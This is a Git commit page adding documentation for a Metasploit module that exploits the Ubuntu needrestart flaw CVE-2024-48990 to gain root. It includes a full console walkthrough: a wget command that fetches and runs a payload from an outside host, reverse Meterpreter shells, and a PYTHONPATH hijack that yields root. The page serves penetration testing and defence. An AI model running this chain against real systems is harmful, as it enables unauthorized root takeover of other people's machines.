adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #19676 from h00die/needrestart

Browse Source 
Ubuntu needrestart LPE (CVE-2024-48990)
This commit is contained in:
jheysel-r7
2025-01-09 17:02:54 -08:00
committed by GitHub
parent 351db34940 437c9fc99e
commit 5374c7b362
4 changed files with 363 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/ubuntu_needrestart_lpe.md
+144
View File
@@ -0,0 +1,144 @@
## Vulnerable Application
Local attackers can execute arbitrary code as root by
tricking needrestart into running the Python interpreter with an
attacker-controlled PYTHONPATH environment variable.
Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
Exploitation against vulnerable needrestart versions on
Debian 12 and Fedora 39 were unsuccessful
however install and run instructions are listed below.
### Debian
Install: `apt-get install needrestart=3.6-4+deb12u1`
Binary location: `/usr/sbin/needrestart`
### Fedora 39
Install: `dnf install needrestart-3.6-9.fc39.noarch`
Binary location: `/usr/sbin/needrestart`
## Verification Steps
1. Install the application
2. Start msfconsole
3. Get an initial shell
4. Do: `use exploit/linux/local/ubuntu_needrestart_lpe`
5. Do: `set lhost <ip>`
6. Do: `set lport <port>`
7. Do: `set session <session>`
8. Do: `run`
9. You should get a root shell.
## Options
### ListenerTimeout
The maximum number of seconds to wait for session. Defaults to `90,000` which is 25hrs.
## Scenarios
### Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
Gain initial shell
```
msf6 > use exploit/multi/script/web_delivery
998
run[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 7
target => 7
msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(multi/script/web_delivery) > set lport 4998
lport => 4998
msf6 exploit(multi/script/web_delivery) > set srvport 8998
srvport => 8998
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 1.1.1.1:4998
[*] Using URL: http://1.1.1.1:8998/dKtdkMS
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: h00die
meterpreter > background
[*] Backgrounding session 1...
```
Priv Esc
```
msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977
lport => 4977
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set session 1
session => 1
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true
verbose => true
msf6 exploit(linux/local/ubuntu_needrestart_lpe) > run
[*] Started reverse TCP handler on 1.1.1.1:4977
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04
[*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ...
[*] Uploading payload: /tmp/.1K8Hy2tOtq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.FzzlJ
[*] Launching exploit, and waiting for needrestart to run...
```
On the remote Ubuntu box run `sudo needrestart`
```
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*]
[*] Traceback (most recent call last):
[*] File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*] exec(line)
[*] File "<string>", line 1, in <module>
[*] ImportError: dynamic module does not define module export function (PyInit_importlib)
[*]
[*] Remainder of file ignored
[*] #########################
[*]
[*] Dont mind the error message above
[*]
[*] Waiting for needrestart to run...
[*] Payload owned by: root
[+] Deleted /tmp/.1K8Hy2tOtq
[+] Deleted /tmp/.FzzlJ
[+] Deleted /tmp/importlib
[*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500
meterpreter >
meterpreter > getuid
Server username: root
```